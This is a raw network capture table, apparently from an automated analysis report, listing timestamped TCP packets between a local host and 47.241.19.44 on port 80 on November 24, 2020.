                                                                                                                                      Nov 24, 2020 21:20:08.157126904 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.157164097 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.157202959 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.157241106 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.157279015 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.157291889 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.157316923 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.157339096 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.157345057 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.157350063 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.157357931 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.157370090 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.157423973 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.297756910 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.297924042 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319242954 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319287062 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319323063 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319369078 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319400072 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319412947 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319443941 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319451094 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319453001 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319457054 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319462061 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319492102 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319530010 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319530964 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319550991 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319567919 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319602966 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319606066 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319618940 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319644928 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319667101 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319705009 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.358778000 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.358833075 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.358871937 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.358908892 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.358948946 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.358961105 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.358987093 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.359009027 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.359015942 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.359019995 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.359024048 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.359028101 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.359036922 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.359081030 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.359097958 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.359119892 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.359137058 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.359175920 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.378710032 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.378813028 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520325899 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520381927 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520422935 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520463943 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520503044 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520509005 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520550966 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520556927 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520562887 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520596027 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520612955 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520636082 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520642042 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520677090 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520692110 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520716906 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520734072 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520756006 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520771980 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520806074 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520843983 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.558634043 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.558748960 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580138922 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580179930 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580219984 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580259085 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580287933 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580296993 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580337048 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580337048 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580343962 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580348969 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580353022 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580375910 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580389977 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580424070 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580446005 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580466986 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580471992 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580503941 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580522060 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580557108 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.721613884 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.721677065 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.721723080 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.721760988 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.721795082 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.721801996 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.721836090 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.721843004 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.721843958 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.721848965 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.721853018 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.721880913 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.721895933 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.721920013 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.721930027 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.721959114 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.721973896 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.722007036 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.722027063 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.722069979 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.761034966 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.761091948 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.761132956 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.761169910 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.761200905 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.761208057 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.761245966 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.761251926 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.761255026 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.761256933 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.761261940 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.761297941 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.761316061 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.761337042 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.761352062 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.761378050 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.761398077 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.761436939 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.761450052 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.761487961 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.761502981 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.761537075 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.761543989 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.761584997 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.781353951 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.781452894 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.922971010 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.923026085 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.923057079 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.923086882 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.923129082 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.923167944 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.923204899 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.923254967 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.923296928 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.923315048 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.923337936 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.923363924 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.923369884 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.923374891 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.923393965 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.962708950 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.962766886 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.962807894 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.962850094 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.962889910 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.962919950 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.962940931 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.962963104 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.962969065 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.962973118 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.962977886 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.962985992 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.963001013 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.963027954 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.963057995 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.963074923 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.963094950 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.963114977 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.963129997 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.963154078 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.963170052 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.963207960 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.982688904 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.982858896 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.003694057 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.003748894 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.003837109 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.003897905 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.022083998 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.022320032 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.124238014 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.124291897 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.124329090 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.124371052 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.124396086 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.124412060 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.124442101 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.124447107 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.124452114 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.124461889 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.124506950 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.124509096 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.124516010 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.124545097 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.124560118 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.124599934 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.124733925 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.124775887 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.124794006 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.124835014 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.163991928 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.164047003 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.164089918 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.164130926 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.164169073 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.164197922 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.164218903 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.164239883 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.164246082 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.164252043 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.164257050 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.164266109 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.164273977 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.164304972 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.164320946 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.164345026 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.164360046 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.164385080 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.164401054 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.164424896 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.164441109 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.164474964 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.183928967 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.184156895 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.205282927 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.205338955 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.205379963 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.205492020 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.205560923 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.205574989 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.223812103 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.223979950 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.326092958 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.326159954 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.326189995 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.326220989 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.326261044 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.326298952 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.326337099 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.326385975 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.326426983 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.326447010 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.326466084 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.326484919 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.326494932 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.326508045 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.326570988 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.329256058 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.379180908 CET4975280192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:09.590087891 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:09.696793079 CET804975247.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:10.187980890 CET804975247.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:10.188031912 CET804975247.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:10.188329935 CET4975280192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:10.189064026 CET4975280192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:10.466381073 CET804975247.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:10.656172037 CET4975580192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:10.656227112 CET4975480192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:10.921529055 CET804975547.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:10.921843052 CET4975580192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:10.923018932 CET804975447.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:10.923171043 CET4975480192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:10.932638884 CET4975480192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:11.240003109 CET804975447.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:11.915036917 CET804975447.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:11.915086031 CET804975447.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:11.915113926 CET804975447.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:11.915154934 CET4975480192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:11.915214062 CET4975480192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:11.917689085 CET4975480192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:12.184501886 CET804975447.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:12.933526993 CET4975580192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:47.278345108 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:47.540668964 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:47.541126966 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:47.541162014 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:47.845313072 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222243071 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222305059 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222347021 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222367048 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.222404003 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222456932 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222493887 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.222507954 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222563028 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222598076 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.222618103 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222668886 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222686052 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.222723961 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.222856998 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.484675884 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.484728098 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.484766960 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.484806061 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.484850883 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.484858036 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.484879017 CET4975880192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:48.484915972 CET804975847.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:48.484977007 CET804975847.241.19.44192.168.2.3
